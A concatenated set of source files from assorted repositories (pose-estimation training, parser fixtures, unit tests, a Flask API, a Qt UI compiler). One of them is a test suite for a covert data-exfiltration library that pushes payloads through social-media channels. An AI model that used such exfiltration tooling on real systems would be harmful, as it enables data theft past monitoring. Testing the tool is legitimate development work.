ax = fig.add_subplot(2*rows, 2*cols, 1 + 2*(col + row*cols))
ax.set_title(wavelet.name + " phi")
ax.plot(x, phi, color)
ax.set_xlim(min(x), max(x))
ax = fig.add_subplot(2*rows, 2*cols, 2*(1 + col + row*cols))
ax.set_title(wavelet.name + " psi")
ax.plot(x, psi, color)
ax.set_xlim(min(x), max(x))
row += 1
ax = fig.add_subplot(2*rows, 2*cols, 1 + 2*(col + row*cols))
ax.set_title(wavelet.name + " phi_r")
ax.plot(x, phi_r, color)
ax.set_xlim(min(x), max(x))
ax = fig.add_subplot(2*rows, 2*cols, 1 + 2*(col + row*cols) + 1)
ax.set_title(wavelet.name + " psi_r")
ax.plot(x, psi_r, color)
ax.set_xlim(min(x), max(x))
plt.show()
|
naive-dense-unet.py | zhiqiangdon/CU-Net | 213 | 12690788 | <reponame>zhiqiangdon/CU-Net
# <NAME>, May 2017
import sys, warnings, traceback, torch
def warn_with_traceback(message, category, filename, lineno, file=None, line=None):
sys.stderr.write(warnings.formatwarning(message, category, filename, lineno, line))
traceback.print_stack(sys._getframe(2))
warnings.showwarning = warn_with_traceback; warnings.simplefilter('always', UserWarning)
torch.utils.backcompat.broadcast_warning.enabled = True
torch.utils.backcompat.keepdim_warning.enabled = True
import os, time
from PIL import Image, ImageDraw
import numpy as np
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
from options.train_options import TrainOptions
from data.mpii_for_mpii_22 import MPII
from models.naive_dense_unet import create_dense_unet
from utils.util import AverageMeter, adjust_lr
from utils.util import TrainHistory, get_n_params, get_n_trainable_params, get_n_conv_params
from utils.visualizer import Visualizer
from utils.checkpoint import Checkpoint
from utils.logger import Logger
from pylib import HumanAcc, HumanPts, HumanAug, Evaluation
cudnn.benchmark = True
joint_flip_index = np.array([[1, 4], [0, 5],
[12, 13], [11, 14], [10, 15], [2, 3]])
def main():
opt = TrainOptions().parse()
train_history = TrainHistory()
checkpoint = Checkpoint()
visualizer = Visualizer(opt)
exp_dir = os.path.join(opt.exp_dir, opt.exp_id)
log_name = opt.vis_env + 'log.txt'
visualizer.log_name = os.path.join(exp_dir, log_name)
os.environ['CUDA_VISIBLE_DEVICES'] = opt.gpu_id
# if opt.dataset == 'mpii':
num_classes = 16
layer_num = 8
net = create_dense_unet(neck_size=4, growth_rate=32, init_chan_num=128,
num_classes=num_classes, layer_num=layer_num)
# num1 = get_n_params(net)
# num2 = get_n_trainable_params(net)
# num3 = get_n_conv_params(net)
# print 'number of params: ', num1
# print 'number of trainalbe params: ', num2
# print 'number of conv params: ', num3
# torch.save(net.state_dict(), 'test-model-size.pth.tar')
# exit()
# device = torch.device("cuda:0")
# net = net.to(device)
net = torch.nn.DataParallel(net).cuda()
optimizer = torch.optim.RMSprop(net.parameters(), lr=opt.lr, alpha=0.99,
eps=1e-8, momentum=0, weight_decay=0)
"""optionally resume from a checkpoint"""
if opt.resume_prefix != '':
# if 'pth' in opt.resume_prefix:
# trunc_index = opt.resume_prefix.index('pth')
# opt.resume_prefix = opt.resume_prefix[0:trunc_index - 1]
# checkpoint.save_prefix = os.path.join(exp_dir, opt.resume_prefix)
checkpoint.save_prefix = exp_dir + '/'
checkpoint.load_prefix = os.path.join(exp_dir, opt.resume_prefix)[0:-1]
checkpoint.load_checkpoint(net, optimizer, train_history)
opt.lr = optimizer.param_groups[0]['lr']
resume_log = True
else:
checkpoint.save_prefix = exp_dir + '/'
resume_log = False
print 'save prefix: ', checkpoint.save_prefix
# model = {'state_dict': net.state_dict()}
# save_path = checkpoint.save_prefix + 'test-model-size.pth.tar'
# torch.save(model, save_path)
# exit()
"""load data"""
train_loader = torch.utils.data.DataLoader(
MPII('dataset/mpii-hr-lsp-normalizer.json', '/bigdata1/zt53/data', is_train=True),
batch_size=opt.bs, shuffle=True,
num_workers=opt.nThreads, pin_memory=True)
val_loader = torch.utils.data.DataLoader(
MPII('dataset/mpii-hr-lsp-normalizer.json', '/bigdata1/zt53/data', is_train=False),
batch_size=opt.bs, shuffle=False,
num_workers=opt.nThreads, pin_memory=True)
"""optimizer"""
# optimizer = torch.optim.SGD( net.parameters(), lr=opt.lr,
# momentum=opt.momentum,
# weight_decay=opt.weight_decay )
# optimizer = torch.optim.RMSprop(net.parameters(), lr=opt.lr, alpha=0.99,
# eps=1e-8, momentum=0, weight_decay=0)
print type(optimizer)
# idx = range(0, 16)
# idx = [e for e in idx if e not in (6, 7, 8, 9, 12, 13)]
idx = [0, 1, 2, 3, 4, 5, 10, 11, 14, 15]
logger = Logger(os.path.join(opt.exp_dir, opt.exp_id, 'training-summary.txt'),
title='training-summary', resume=resume_log)
logger.set_names(['Epoch', 'LR', 'Train Loss', 'Val Loss', 'Train Acc', 'Val Acc'])
if not opt.is_train:
visualizer.log_path = os.path.join(opt.exp_dir, opt.exp_id, 'val_log.txt')
val_loss, val_pckh, predictions = validate(val_loader, net,
train_history.epoch[-1]['epoch'],
visualizer, idx, joint_flip_index,
num_classes)
checkpoint.save_preds(predictions)
return
"""training and validation"""
start_epoch = 0
if opt.resume_prefix != '':
start_epoch = train_history.epoch[-1]['epoch'] + 1
for epoch in range(start_epoch, opt.nEpochs):
adjust_lr(opt, optimizer, epoch)
# # train for one epoch
train_loss, train_pckh = train(train_loader, net, optimizer,
epoch, visualizer, idx, opt)
# evaluate on validation set
val_loss, val_pckh, predictions = validate(val_loader, net, epoch,
visualizer, idx, joint_flip_index,
num_classes)
# visualizer.display_imgpts(imgs, pred_pts, 4)
# exit()
# update training history
e = OrderedDict([('epoch', epoch)])
lr = OrderedDict([('lr', optimizer.param_groups[0]['lr'])])
loss = OrderedDict([('train_loss', train_loss), ('val_loss', val_loss)])
pckh = OrderedDict([('val_pckh', val_pckh)])
train_history.update(e, lr, loss, pckh)
checkpoint.save_checkpoint(net, optimizer, train_history, predictions)
# visualizer.plot_train_history(train_history)
logger.append([epoch, optimizer.param_groups[0]['lr'], train_loss,
val_loss, train_pckh, val_pckh])
logger.close()
# exit()
# if train_history.is_best:
# visualizer.display_imgpts(imgs, pred_pts, 4)
def train(train_loader, net, optimizer, epoch, visualizer, idx, opt):
# batch_time = AverageMeter()
# data_time = AverageMeter()
losses = AverageMeter()
pckhs = AverageMeter()
pckhs_origin_res = AverageMeter()
# switch to train mode
net.train()
# end = time.time()
for i, (img, heatmap, c, s, r, grnd_pts,
normalizer) in enumerate(train_loader):
# """measure data loading time"""
# data_time.update(time.time() - end)
# input and groundtruth
# img_var = torch.autograd.Variable(img)
img = img.cuda(non_blocking=True)
heatmap = heatmap.cuda(non_blocking=True)
# target_var = torch.autograd.Variable(heatmap)
# output and loss
# output1, output2 = net(img_var)
# loss = (output1 - target_var) ** 2 + (output2 - target_var) ** 2
output = net(img)
# exit()
# print(type(output))
# print(len(output))
tmp_loss = (output - heatmap) ** 2
loss = tmp_loss.sum() / tmp_loss.numel()
# for per_out in output:
# tmp_loss = (per_out - heatmap) ** 2
# loss = loss + tmp_loss.sum() / tmp_loss.numel()
# gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# """measure optimization time"""
# batch_time.update(time.time() - end)
# end = time.time()
# print log
losses.update(loss.item())
pckh = Evaluation.accuracy(output.cpu(), heatmap.cpu(), idx)
pckhs.update(pckh[0])
pckh_origin_res = Evaluation.accuracy_origin_res(output.cpu(),
c, s, [64, 64],
grnd_pts, normalizer, r)
pckhs_origin_res.update(pckh_origin_res[0])
loss_dict = OrderedDict([('loss', losses.avg),
('pckh', pckhs.avg),
('pckh_origin_res', pckhs_origin_res.avg)])
if i % opt.print_freq == 0 or i == len(train_loader) - 1:
visualizer.print_log(epoch, i, len(train_loader),
value1=loss_dict)
# if i == 1:
# break
return losses.avg, pckhs_origin_res.avg
def validate(val_loader, net, epoch, visualizer, idx, joint_flip_index, num_classes):
batch_time = AverageMeter()
losses = AverageMeter()
pckhs = AverageMeter()
pckhs_origin_res = AverageMeter()
img_batch_list = []
pts_batch_list = []
predictions = torch.Tensor(val_loader.dataset.__len__(), num_classes, 2)
# switch to evaluate mode
net.eval()
# end = time.time()
with torch.no_grad():
for i, (img, heatmap, center, scale, rot, grnd_pts,
normalizer, index) in enumerate(val_loader):
# input and groundtruth
# input_var = torch.autograd.Variable(img, volatile=True)
input = img.cuda(non_blocking=True)
heatmap = heatmap.cuda(non_blocking=True)
# target_var = torch.autograd.Variable(heatmap)
# output and loss
# output1, output2 = net(input_var)
# loss = (output1 - target_var) ** 2 + (output2 - target_var) ** 2
output1 = net(input)
tmp_loss = (output1 - heatmap) ** 2
loss = tmp_loss.sum() / tmp_loss.numel()
# for per_out in output1:
# tmp_loss = (per_out - heatmap) ** 2
# loss = loss + tmp_loss.sum() / tmp_loss.numel()
# flipping the image
img_flip = img.numpy()[:, :, :, ::-1].copy()
img_flip = torch.from_numpy(img_flip)
# input_var = torch.autograd.Variable(img_flip, volatile=True)
input = img_flip.cuda(non_blocking=True)
# output11, output22 = net(input_var)
output2 = net(input)
output2 = HumanAug.flip_channels(output2.cpu())
output2 = HumanAug.shuffle_channels_for_horizontal_flipping(output2, joint_flip_index)
output = (output1.cpu() + output2) / 2
# calculate measure
# pred_pts = HumanPts.heatmap2pts(output) # b x L x 2
# pts = HumanPts.heatmap2pts(target_var.cpu().data)
# pckh = HumanAcc.approx_PCKh(pred_pts, pts, idx, heatmap.size(3)) # b -> 1
pckh = Evaluation.accuracy(output, heatmap.cpu(), idx)
pckhs.update(pckh[0])
pckh_origin_res = Evaluation.accuracy_origin_res(output, center, scale, [64, 64],
grnd_pts, normalizer, rot)
pckhs_origin_res.update(pckh_origin_res[0])
# """measure elapsed time"""
# batch_time.update(time.time() - end)
# end = time.time()
# print log
losses.update(loss.item())
loss_dict = OrderedDict([('loss', losses.avg),
('pckh', pckhs.avg),
('pckh_origin_res', pckhs_origin_res.avg)])
visualizer.print_log(epoch, i, len(val_loader), value1=loss_dict)
# img_batch_list.append(img)
# pts_batch_list.append(pred_pts*4.)
preds = Evaluation.final_preds(output, center, scale, [64, 64], rot)
for n in range(output.size(0)):
predictions[index[n], :, :] = preds[n, :, :]
# if i == 1:
# break
return losses.avg, pckhs_origin_res.avg, predictions
if __name__ == '__main__':
main()
|
sneakers/tests/test_all.py | jayvdb/sneaky-creeper | 146 | 12690838 | import unittest
import json
import random
import string
import os
from unittest.case import SkipTest
from nose.tools import assert_equals, assert_in
from functools import partial
from twython import TwythonError
import sneakers
basePath = os.path.dirname(os.path.abspath(sneakers.__file__))
def unit_channel(channel, data):
""" Test a channel. """
t = sneakers.Exfil(channel, [])
# get parameters from config folder
configPath = os.path.join(basePath, 'config', '{}-config.json'.format(channel))
try:
with open(configPath) as f:
params = json.loads(f.read())
except:
raise SkipTest('could not load configuration file for {}'.format(channel))
t.set_channel_params({'sending': params[channel],
'receiving': params[channel]})
try:
t.send(data)
except TwythonError as e:
# something out of our control
raise SkipTest("Twython error occurred: {}".format(e))
got = t.receive()
if len(data) > 300:
assert_in(data, got,
'Failed in assertion for the \'{}\' channel with a very large payload.'.format(channel))
else:
assert_in(data, got)
######################################################
#################### Actual Tests ####################
######################################################
def test_AllChannelsBasic():
""" Test all channels with basic alphanumeric characters. """
# need to have some random; a few platforms (looking at you, Twitter) have
# issues if you post the same thing multiple times
rand = ''.join([random.choice(string.letters) for i in range(5)])
data = ''.join([string.letters, string.digits, rand])
for channel in sneakers.Exfil.list_channels() :
f = partial(unit_channel, channel, data)
f.description = "Test the {} channel with basic alphanumeric characters.".format(channel)
yield (f, )
def test_AllChannelsAdvanced():
""" Test all channels with a full range of printable characters. """
# need to have some random; a few platforms (looking at you, Twitter) have
# issues if you post the same thing multiple times
rand = ''.join([random.choice(string.letters) for i in range(5)])
our_printable = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ "
# excludes \t\r\n
data = ''.join([our_printable, rand])
for channel in sneakers.Exfil.list_channels() :
f = partial(unit_channel, channel, data)
f.description = "Test the {} channel with the full range of printable characters.".format(channel)
yield (f, )
def test_AllChannelsLong():
""" Test all channels with long messages. """
data = ''.join([random.choice(string.letters) for i in range(500000)])
for channel in sneakers.Exfil.list_channels() :
f = partial(unit_channel, channel, data)
f.description = "Test the {} channel with a very long message.".format(channel)
yield (f, )
|
src/genie/libs/parser/comware/tests/DisplayInterfaces/cli/equal/golden_output_expected.py | balmasea/genieparser | 204 | 12690858 | expected_output = {
"GigabitEthernet3/8/0/38": {
"auto_negotiate": True,
"counters": {
"normal": {
"in_broadcast_pkts": 1093,
"in_mac_pause_frames": 0,
"in_multicast_pkts": 18864,
"in_octets": 0,
"in_pkts": 7446905,
"in_unicast_pkts": 7426948,
"out_broadcast_pkts": 373635,
"out_mac_pause_frames": 0,
"out_multicast_pkts": 34367737,
"out_octets": 0,
"out_pkts": 40981139,
"out_unicast_pkts": 6239767
},
"in_abort": 0,
"in_broadcast_pkts": 1093,
"in_crc_errors": 0,
"in_errors": 0,
"in_frame": 0,
"in_giants": 0,
"in_ignored": 0,
"in_mac_pause_frames": 0,
"in_multicast_pkts": 18864,
"in_octets": 10280397282,
"in_overrun": 0,
"in_parity_errors": 0,
"in_pkts": 7446905,
"in_runts": 0,
"in_throttles": 0,
"in_unicast_pkts": 7426948,
"last_clear": "Never",
"out_abort": 0,
"out_broadcast_pkts": 373635,
"out_buffer_failure": 0,
"out_collision": 0,
"out_deferred": 0,
"out_errors": 0,
"out_late_collision": 0,
"out_lost_carrier": 0,
"out_mac_pause_frames": 0,
"out_multicast_pkts": 34367737,
"out_no_carrier": 0,
"out_octets": 44666966188,
"out_pkts": 40981139,
"out_underruns": 0,
"out_unicast_pkts": 6239767,
"rate": {
"in_rate_bytes": 0,
"in_rate_pkts": 0,
"load_interval": 300,
"out_rate_bytes": 0,
"out_rate_pkts": 0
}
},
"description": "GigabitEthernet3/8/0/38 Interface",
"duplex_mode": "unknown",
"enabled": True,
"frame_type": "PKTFMT_ETHNT_2",
"mac_address": "cc3e-5f69-5751",
"max_frame_length": 9216,
"media_type": "twisted pair",
"oper_status": "DOWN",
"port_speed": "unknown",
"port_type": "1000_BASE_T",
"priority": 0,
"pvid": 17,
"switchport": {
"mode": "access",
"untagged": 17
},
"type": "GigabitEthernet"
}
}
|
pymatgen/util/tests/test_num_utils.py | wangyusu/pymatgen | 921 | 12690861 | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import random
import unittest
from pymatgen.util.num import abs_cap, min_max_indexes, round_to_sigfigs
__author__ = "<NAME>"
__copyright__ = "Copyright 2013, The Materials Project"
__version__ = "0.1"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__date__ = "9/25/14"
class FuncTestCase(unittest.TestCase):
def test_abs_cap(self):
self.assertEqual(abs_cap(1.000000001), 1.0)
self.assertEqual(abs_cap(-1.000000001), -1.0)
v = random.uniform(-1, 1)
self.assertEqual(abs_cap(v), v)
self.assertEqual(abs_cap(1.000000001, 2), 1.000000001)
self.assertEqual(abs_cap(-2.000000001, 2), -2.0)
def test_min_max_indexes(self):
val = ["b", "a", "m", "z", "y"]
min_ind, max_ind = min_max_indexes(val)
self.assertEqual(min_ind, 1)
self.assertEqual(max_ind, 3)
def test_round(self):
vals = [424.2425, 2.3425356, 0.000042535636653, 0.23, 2.468e6, 0, -1.392156]
sigfigs = range(1, 6)
rounded_vals = [
[400.0, 420.0, 424.0, 424.2, 424.24],
[2.0, 2.3, 2.34, 2.343, 2.3425],
[4e-5, 4.3e-5, 4.25e-5, 4.254e-5, 4.2536e-5],
[0.2, 0.23, 0.23, 0.23, 0.23],
[2e6, 2.5e6, 2.47e6, 2.468e6, 2.468e6],
[0, 0, 0, 0, 0],
[-1, -1.4, -1.39, -1.392, -1.3922],
]
for v, val in enumerate(vals):
for s, sig in enumerate(sigfigs):
self.assertEqual(round_to_sigfigs(val, sig), rounded_vals[v][s])
with self.assertRaises(ValueError):
round_to_sigfigs(3.5, -2)
with self.assertRaises(TypeError):
round_to_sigfigs(3.5, 3.5)
if __name__ == "__main__":
unittest.main()
|
ryu/tests/unit/packet/test_bmp.py | umkcdcrg01/ryu_openflow | 269 | 12690863 |
# Copyright (C) 2014 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from nose.tools import eq_
from nose.tools import ok_
from time import time
from ryu.lib.packet import bmp
from ryu.lib.packet import bgp
from ryu.lib.packet import afi
from ryu.lib.packet import safi
class Test_bmp(unittest.TestCase):
""" Test case for ryu.lib.packet.bmp
"""
def setUp(self):
pass
def tearDown(self):
pass
def test_route_monitoring(self):
update = bgp.BGPUpdate()
msg = bmp.BMPRouteMonitoring(bgp_update=update,
peer_type=bmp.BMP_PEER_TYPE_GLOBAL,
is_post_policy=True,
peer_distinguisher=0,
peer_address='192.0.2.1',
peer_as=30000,
peer_bgp_id='192.0.2.1',
timestamp=time())
binmsg = msg.serialize()
msg2, rest = bmp.BMPMessage.parser(binmsg)
eq_(msg.to_jsondict(), msg2.to_jsondict())
eq_(rest, '')
def test_statistics_report(self):
stats = [{'type': bmp.BMP_STAT_TYPE_REJECTED, 'value': 100},
{'type': bmp.BMP_STAT_TYPE_DUPLICATE_PREFIX, 'value': 200},
{'type': bmp.BMP_STAT_TYPE_DUPLICATE_WITHDRAW, 'value': 300},
{'type': bmp.BMP_STAT_TYPE_ADJ_RIB_IN, 'value': 100000},
{'type': bmp.BMP_STAT_TYPE_LOC_RIB, 'value': 500000}]
msg = bmp.BMPStatisticsReport(stats=stats,
peer_type=bmp.BMP_PEER_TYPE_GLOBAL,
is_post_policy=True,
peer_distinguisher=0,
peer_address='192.0.2.1',
peer_as=30000,
peer_bgp_id='192.0.2.1',
timestamp=time())
binmsg = msg.serialize()
msg2, rest = bmp.BMPMessage.parser(binmsg)
eq_(msg.to_jsondict(), msg2.to_jsondict())
eq_(rest, '')
def test_peer_down_notification(self):
reason = bmp.BMP_PEER_DOWN_REASON_LOCAL_BGP_NOTIFICATION
data = "hoge"
data = bgp.BGPNotification(error_code=1, error_subcode=2, data=data)
msg = bmp.BMPPeerDownNotification(reason=reason, data=data,
peer_type=bmp.BMP_PEER_TYPE_GLOBAL,
is_post_policy=True,
peer_distinguisher=0,
peer_address='192.0.2.1',
peer_as=30000,
peer_bgp_id='192.0.2.1',
timestamp=time())
binmsg = msg.serialize()
msg2, rest = bmp.BMPMessage.parser(binmsg)
eq_(msg.to_jsondict(), msg2.to_jsondict())
eq_(rest, '')
def test_peer_up_notification(self):
opt_param = [bgp.BGPOptParamCapabilityUnknown(cap_code=200,
cap_value='hoge'),
bgp.BGPOptParamCapabilityRouteRefresh(),
bgp.BGPOptParamCapabilityMultiprotocol(
afi=afi.IP, safi=safi.MPLS_VPN)]
open_message = bgp.BGPOpen(my_as=40000, bgp_identifier='192.0.2.2',
opt_param=opt_param)
msg = bmp.BMPPeerUpNotification(local_address='192.0.2.2',
local_port=179,
remote_port=11089,
sent_open_message=open_message,
received_open_message=open_message,
peer_type=bmp.BMP_PEER_TYPE_GLOBAL,
is_post_policy=True,
peer_distinguisher=0,
peer_address='192.0.2.1',
peer_as=30000,
peer_bgp_id='192.0.2.1',
timestamp=time())
binmsg = msg.serialize()
msg2, rest = bmp.BMPMessage.parser(binmsg)
eq_(msg.to_jsondict(), msg2.to_jsondict())
eq_(rest, '')
def test_initiation(self):
initiation_info = [{'type': bmp.BMP_INIT_TYPE_STRING,
'value': u'This is Ryu BGP BMP message'}]
msg = bmp.BMPInitiation(info=initiation_info)
binmsg = msg.serialize()
msg2, rest = bmp.BMPMessage.parser(binmsg)
eq_(msg.to_jsondict(lambda v: v), msg2.to_jsondict(lambda v: v))
eq_(rest, '')
def test_termination(self):
termination_info = [{'type': bmp.BMP_TERM_TYPE_STRING,
'value': u'Session administatively closed'},
{'type': bmp.BMP_TERM_TYPE_REASON,
'value': bmp.BMP_TERM_REASON_ADMIN}]
msg = bmp.BMPTermination(info=termination_info)
binmsg = msg.serialize()
msg2, rest = bmp.BMPMessage.parser(binmsg)
eq_(msg.to_jsondict(lambda v: v), msg2.to_jsondict(lambda v: v))
eq_(rest, '')
|
app/apiv2/plans/plans.py | Joey-Wondersign/Staffjoy-suite-Joey | 890 | 12690865 | from flask_restful import Resource
from app.constants import API_ENVELOPE, PLAN_PUBLIC_KEYS
from app.plans import plans
class PlansApi(Resource):
# Public (for authenticated users)
def get(self):
# Flatten dict to an array to match rest of api style
output = []
for plan_id, value in plans.iteritems():
clean_plan = {"id": plan_id}
for key in PLAN_PUBLIC_KEYS:
clean_plan[key] = value.get(key)
output.append(clean_plan)
return {
API_ENVELOPE: output,
}
|
CV/CLPI-Collaborative-Learning-for-Diabetic-Retinopathy-Grading/parser.py | zhangyimi/Research | 1,319 | 12690866 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
def args_parser():
'''Common classifier application command-line arguments.
'''
parser = argparse.ArgumentParser(
description='image classification model command-line')
parser.add_argument('--arch', '-a', metavar='ARCH', default='DenseNet121')
parser.add_argument('--data', '-d', default='./data')
parser.add_argument('--resume-from', dest='resumed_checkpoint_path', default='',
type=str, metavar='PATH',
help='path to latest checkpoint. Use to resume paused training session.')
parser.add_argument('--infer-file', dest='infer_file')
parser.add_argument('--infer-classdim', dest='infer_classdim', default=5)
return parser
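

def _example_usage():
    # Editorial usage sketch (not part of the original file): shows how the parser above
    # is typically consumed; the flag values here are purely illustrative.
    parser = args_parser()
    args = parser.parse_args(['--arch', 'DenseNet121', '--infer-file', 'sample.txt'])
    return args.arch, args.infer_file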
|
SRT/exps/BASE-eval-image.py | yerang823/landmark-detection | 612 | 12690869 | # Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
# For the regression-based detector:
# python exps/BASE-eval-image.py --image ./cache_data/cache/self.jpeg --face 250 150 900 1100 --model ${check_point_path}
#
from __future__ import division
import sys, time, torch, random, argparse, PIL
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
from pathlib import Path
import numpy as np
lib_dir = (Path(__file__).parent / '..' / 'lib').resolve()
if str(lib_dir) not in sys.path: sys.path.insert(0, str(lib_dir))
assert sys.version_info.major == 3, 'Please upgrade from {:} to Python 3.x'.format(sys.version_info)
from datasets import GeneralDatasetV2 as Dataset, PointMeta2V as PointMeta, pil_loader
from xvision import transforms2v as transforms, draw_image_by_points
from xvision import normalize_points, denormalize_points
from models import obtain_pro_model, remove_module_dict
from config_utils import load_configure
def evaluate(args):
if args.cuda:
assert torch.cuda.is_available(), 'CUDA is not available.'
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
print ('Use the GPU mode')
else:
print ('Use the CPU mode')
print ('The image is {:}'.format(args.image))
print ('The model is {:}'.format(args.model))
last_info_or_snap = Path(args.model)
  assert last_info_or_snap.exists(), 'The model path {:} does not exist'.format(last_info_or_snap)
last_info_or_snap = torch.load(last_info_or_snap, map_location=torch.device('cpu'))
if 'last_checkpoint' in last_info_or_snap:
snapshot = last_info_or_snap['last_checkpoint']
assert snapshot.exists(), 'The model path {:} does not exist'.format(snapshot)
print ('The face bounding box is {:}'.format(args.face))
assert len(args.face) == 4, 'Invalid face input : {:}'.format(args.face)
snapshot = torch.load(snapshot, map_location=torch.device('cpu'))
else:
snapshot = last_info_or_snap
param = snapshot['args']
# General Data Argumentation
if param.use_gray == False:
mean_fill = tuple( [int(x*255) for x in [0.485, 0.456, 0.406] ] )
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std =[0.229, 0.224, 0.225])
else:
mean_fill = (0.5,)
normalize = transforms.Normalize(mean=[mean_fill[0]], std=[0.5])
eval_transform = transforms.Compose2V([transforms.ToTensor(), normalize, \
transforms.PreCrop(param.pre_crop_expand), \
transforms.CenterCrop(param.crop_max)])
model_config = load_configure(param.model_config, None)
# dataset = Dataset(eval_transform, param.sigma, model_config.downsample, param.heatmap_type, (120, 96), param.use_gray, None, param.data_indicator)
dataset = Dataset(eval_transform, param.sigma, model_config.downsample, param.heatmap_type, (param.height, param.width), param.use_gray, None, param.data_indicator)
dataset.reset( param.num_pts )
net = obtain_pro_model(model_config, param.num_pts, param.sigma, param.use_gray)
net.eval()
try:
net.load_state_dict( snapshot['detector'] )
except:
net.load_state_dict( remove_module_dict(snapshot['detector']) )
if args.cuda: net = net.cuda()
print ('Processing the input face image.')
face_meta = PointMeta(dataset.NUM_PTS, None, args.face, args.image, 'BASE-EVAL')
face_img = pil_loader(args.image, dataset.use_gray)
affineImage, heatmaps, mask, norm_trans_points, transthetas, _, _, _, shape = dataset._process_(face_img, face_meta, -1)
# network forward
with torch.no_grad():
if args.cuda: inputs = affineImage.unsqueeze(0).cuda()
else : inputs = affineImage.unsqueeze(0)
batch_locs = net(inputs)
batch_locs = batch_locs.cpu()
(batch_size, C, H, W), num_pts = inputs.size(), param.num_pts
norm_locs = torch.cat((batch_locs[0].transpose(1,0), torch.ones(1, num_pts)), dim=0)
norm_locs = torch.mm(transthetas[:2, :], norm_locs)
real_locs = denormalize_points(shape.tolist(), norm_locs)
print ('the coordinates for {:} facial landmarks:'.format(param.num_pts))
for i in range(param.num_pts):
point = real_locs[:, i]
print ('the {:02d}/{:02d}-th landmark : ({:.1f}, {:.1f})'.format(i, param.num_pts, float(point[0]), float(point[1])))
if args.save:
resize = 512
image = draw_image_by_points(args.image, real_locs, 2, (255, 0, 0), args.face, resize)
image.save(args.save)
print ('save the visualization results into {:}'.format(args.save))
else:
print ('ignore the visualization procedure')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Evaluate a single image by the trained model', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--image', type=str, help='The evaluation image path.')
parser.add_argument('--model', type=str, help='The snapshot to the saved detector.')
parser.add_argument('--face', nargs='+', type=float, help='The coordinate [x1,y1,x2,y2] of a face')
parser.add_argument('--save', type=str, help='The path to save the visualized results.')
parser.add_argument('--cuda', action='store_true', help='Use cuda or not.')
args = parser.parse_args()
evaluate(args)
|
PyFlow/UI/CompileUiQt.py | luzpaz/PyFlow | 1,463 | 12690901 | ## Copyright 2015-2019 <NAME>, <NAME>
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
## http://www.apache.org/licenses/LICENSE-2.0
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
import os
import pyside2uic
import subprocess
CURRENT_DIR = os.path.dirname(__file__).replace('\\', '/') + '/'
INTERPRETER_PATH = 'python.exe'
def ui_to_py(ui_file):
if not os.path.isfile(ui_file):
msg = 'no such file'
print(msg)
return msg
py_file_name = os.path.splitext(ui_file)[0] + '.py'
with open(py_file_name, 'w') as py_file:
try:
pyside2uic.compileUi(ui_file, py_file)
print('{0} converted to {1}.'.format(ui_file.upper(), py_file_name.upper()))
except Exception as e:
print('Error: compilation error.', e)
bakFileName = py_file_name.replace(".py", "_backup.py")
# convert to cross compatible code
subprocess.call([INTERPRETER_PATH, '-m', 'Qt', '--convert', py_file_name])
if(os.path.isfile(bakFileName)):
os.remove(bakFileName)
print("REMOVING", bakFileName)
def compile():
for d, dirs, files in os.walk(CURRENT_DIR):
if "Python" in d or ".git" in d:
continue
for f in files:
if "." in f:
ext = f.split('.')[1]
if ext == 'ui':
uiFile = os.path.join(d, f)
ui_to_py(uiFile)
if __name__ == '__main__':
compile()
|
src/numbers_parser/_unpack_numbers.py | jessie-murray/numbers-parser | 110 | 12690932 |
# vi: ft=python
import argparse
import os
import json
import re
import sys
from numbers_parser.unpack import read_numbers_file
from numbers_parser import _get_version
from numbers_parser.iwafile import IWAFile
from numbers_parser.exceptions import FileFormatError
def ensure_directory_exists(prefix, path):
"""Ensure that a path's directory exists."""
parts = os.path.split(path)
try:
os.makedirs(os.path.join(*([prefix] + list(parts[:-1]))))
except OSError:
pass
def convert_uuids_to_hex(obj):
if isinstance(obj, dict):
for k, v in obj.items():
if isinstance(v, dict) or isinstance(v, list):
convert_uuids_to_hex(v)
elif k == "lower" or k == "upper":
obj[k] = "0x{0:0{1}X}".format(int(v), 16)
elif k in ["uuidW0", "uuidW1", "uuidW2", "uuidW3"]:
obj[k] = "0x{0:0{1}X}".format(v, 8)
elif isinstance(obj, list):
for v in obj:
if isinstance(v, dict) or isinstance(v, list):
convert_uuids_to_hex(v)
def process_file(contents, filename, output_dir, hex_uuids):
filename = re.sub(r".*\.numbers/", "", filename)
ensure_directory_exists(output_dir, filename)
target_path = os.path.join(output_dir, filename)
if isinstance(contents, IWAFile):
target_path = target_path.replace(".iwa", "")
target_path += ".txt"
with open(target_path, "w") as out:
data = contents.to_dict()
